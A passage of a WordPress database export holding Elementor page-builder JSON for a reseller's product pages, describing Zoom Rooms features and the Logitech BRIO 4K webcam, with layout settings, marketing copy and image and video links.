:\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"isInner\":false},{\"id\":\"ab89310\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"fcc54ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Meet with anyone<\\/h4><p class=\\\"mt-1 mb-5\\\">Include remote participants on desktop, mobile, or other conference room systems.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3c1657b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">One touch to start meetings<\\/h4><p class=\\\"mt-1 mb-5\\\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"406125c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Centralized management<\\/h4><p class=\\\"mt-1 mb-5\\\">Get the overview status and management of deployed conference rooms in a single admin console<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0518cb7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92a3de4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c7f20ea\",\"elType\":\"widget\",\"settings\":{\"title\":\"Zoom Rooms includes the following value-added services at no additional cost.\",\"header_size\":\"h3\",\"align\":\"center\",\"title_color\":\"#000000\",\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0e401c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"428f120\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a4857de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Digital Signage<\\/h3><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.<\\/p><ul><li>Leverage room displays when not in use<\\/li><li>Manage displays at scale or individually<\\/li><li>Unlimited amount of displays supported (both in and out of conference rooms)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b6e2b30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8217db2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Scheduling Display<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1221c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cf0ae88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Make interactive collaboration easy with touch screens<\\/h3><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation\\u00a0 all at the tip of your fingers.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d2912a1\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/gezS90Pg_fk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d565e7b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c28793b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29d7347\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5848,2997,'_wp_page_template','template-fullwidth.php'),(5849,2997,'_elementor_edit_mode','builder'),(5850,2997,'_elementor_template_type','post'),(5851,2997,'_elementor_data','[{\"id\":\"a2dcd03\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_hover_background\":\"classic\"},\"elements\":[{\"id\":\"31ec800\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"740db1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH BRIO<\\/h2><p>Ultra HD Webcam for Video Conferencing, Streaming, and Recording<\\/p><ul><li>Spectacular video quality up to 4K<\\/li><li>Look great in any light with HDR and RightLight\\u2122 3<\\/li><li>Enhanced security with Windows Hello\\u2122<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89e09c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9d928f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-1.png\",\"id\":2990},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1b40ef\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ffa8ec9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"acd0c54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A NEW BENCHMARK FOR WEBCAMS<\\/h2><p>Step up to the world\\u2019s most technologically advanced webcam and get professional-quality video for video conferencing, streaming, or recording. Logitech BRIO is packed with features that produce stunning video in any environment. Our premier 4K ultra high-def camera offers 5x digital zoom, high frame rates, outstanding low-light performance, HDR, and RightLight\\u2122 3.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ab9e0f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f1b50b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-10},\"elements\":[{\"id\":\"0b9f29a\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b6a2832\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23ab01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"1ca51fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":62.581},\"elements\":[{\"id\":\"f2934d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-1.jpg\",\"id\":2992}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ec48173\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":37.416},\"elements\":[{\"id\":\"bac33cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CAPTURE EVERY DETAIL IN 4K HD<\\/h3><p>Stream crystal-clear video with superb resolution, frame rate, color, and detail. Logitech BRIO delivers 4K Ultra HD at 30 fps or 1080p at either 30 or an ultra-smooth 60 fps for outstanding clarity, smoothness, and detail. Get a closer look with 5x zoom.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6738d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"811eef0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f989bbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>LOOK GREAT IN ANY LIGHT<\\/h3><p>Now you can use your video conferencing, streaming, and video recording applications in any lighting condition \\u2013 and always look your best. Whether in low light or bright sunshine, Logitech BRIO with RightLight\\u2122 3 and high dynamic range (HDR) technology adjusts to highlight the most important subject: you.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0a5f81\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"936ba59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms.jpg\",\"id\":2993}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf2d1fc\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"a3a95ea\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":63.441},\"elements\":[{\"id\":\"5257f5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-2.jpg\",\"id\":2994}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8a03983\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":36.556},\"elements\":[{\"id\":\"46329a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SECURITY MEETS CONVENIENCE<\\/h3><p>Powered by both optical and infrared sensors, BRIO delivers fast and secure facial recognition for Windows Hello. No need to type a password for Windows 10: simply look into BRIO\\u2019s lens to login.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d4c77a8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e3245b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-10},\"elements\":[{\"id\":\"50c4419\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"53bae29\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bb97b05\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"d8a48db\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"06ddb38\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ADJUSTABLE FIELD OF VIEW<\\/h4><p>Choose from three field of view settings to perfectly frame your video. For an ideal head and shoulders shot, pick 65 degrees. For larger groups or to capture more of the room, choose 78 or 90 degrees.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ff1e98e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ebfd48a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4K RECORDING<\\/h4><p>Use BRIO with software like Camera for Windows 10, XSplit Broadcaster, OBS, and SwiftCapture to record in resolutions up to 4K.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eecae79\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5eff684\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SMOOTH STREAMING<\\/h4><p>BRIO retains a high frame rate whatever the lighting to match your gaming broadcast with no lag. Stream in full 1080p HD at up to 60 frames per second for smooth, fluid video that keeps up with your every move.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79b792d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b0c8920\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>BRIO is certified compatible with Skype for Business, Windows Hello, and Cisco Jabber\\u2122, works with Microsoft Cortana\\u00ae, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a 